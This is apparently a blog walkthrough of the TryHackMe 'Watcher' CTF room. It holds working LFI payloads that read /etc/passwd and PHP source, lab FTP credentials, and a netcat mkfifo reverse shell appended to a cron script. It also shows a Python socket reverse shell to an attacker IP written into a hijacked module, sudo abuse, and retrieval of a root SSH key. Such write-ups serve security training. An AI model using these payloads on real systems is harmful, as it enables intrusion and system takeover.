---
title: Watcher
date: 2022-12-18 18:32:00 -0500
categories: [Walkthrough, Tryhackme, CTF]
tags: [nmap, LFI, ftp, linux, sudo, find]
---

<https://tryhackme.com/room/watcher> A boot2root Linux machine utilising web exploits along with some common privilege escalation techniques.

# Watcher

7 flags in this room

wait 5 mins for all services to start up on the system

starting off with nmap `nmap -p- watcher.thm -vvv`

we start off running into some pretty simble LFI and can pull `/post.php?post=../../../etc/passwd` and find some users `mat` and `toby`.

scanning with gobuster reveals `robots.txt` and we can find flag 1

we can then `/post.php?post=secret_file_do_not_read.txt` and get the note for the ftp user `ftpuser:givemefiles777`

- `/post.php?post=php://filter/convert.base64-encode/resource=post.php`

this php script is just `<?php include $_GET["post"]; ?>`

inside of the secret file was a note 

```
 Hi Mat,

The credentials for the FTP server are below. I've set the files to be saved to /home/ftpuser/ftp/files.

Will
```

So if we upload a reverse shell on the php we should be able to include it, and we get a www-data shell.

`sudo -l` we can run any command so get a toby bash, `sudo -u toby bash` and pickup the 4th flag in tobys home dir.

missed a flag so `find / -name flag_3.txt 2>/dev/null` and pick it up

Mat left us a note in tobys home dir

```
Hi Toby,

I've got the cron jobs set up now so don't worry about getting that done.

Mat
```

mat is running a script in tobys dir under his privilege, cronjob `/home/toby/jobs/cow.sh`

- `echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc localhost 6670 >/tmp/f" >> /home/toby/jobs/cow.sh`

we can pickup flag 5 in mats home and another note

```
Hi Mat,

I've set up your sudo rights to use the python script as my user. You can only run the script with sudo so it should be safe.

Will
```

so we can run his `will_script.py` as sudo, which lso means the whitelist of commands. So since `cat` is allowed possibly be able to read some interesting information

```
import os
import sys
from cmd import get_command

cmd = get_command(sys.argv[1])

whitelist = ["ls -lah", "id", "cat /etc/passwd"]

if cmd not in whitelist:
        print("Invalid command!")
        exit()

os.system(cmd)
```

this is importing cmd.py so we can overwrite it with a python shell and execute.

`echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('10.2.3.64',6676));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);" > cmd.py`

- `sudo -u will python3 /home/mat/scripts/will_script.py cmd.py`

the hint for the last key is ssh but trying to use find doesnt seem to work and scaning through linpeas i cant find much. in `/opt/backups` we find a b64 keyfile. we can python3 webserver this over to out attacking machine decode and login as root via ssh for the last flag. `b64 -d key > root_rsa && chmod 600 root_rsa` `ssh root@watcher.thm -i root_rsa` and we win.
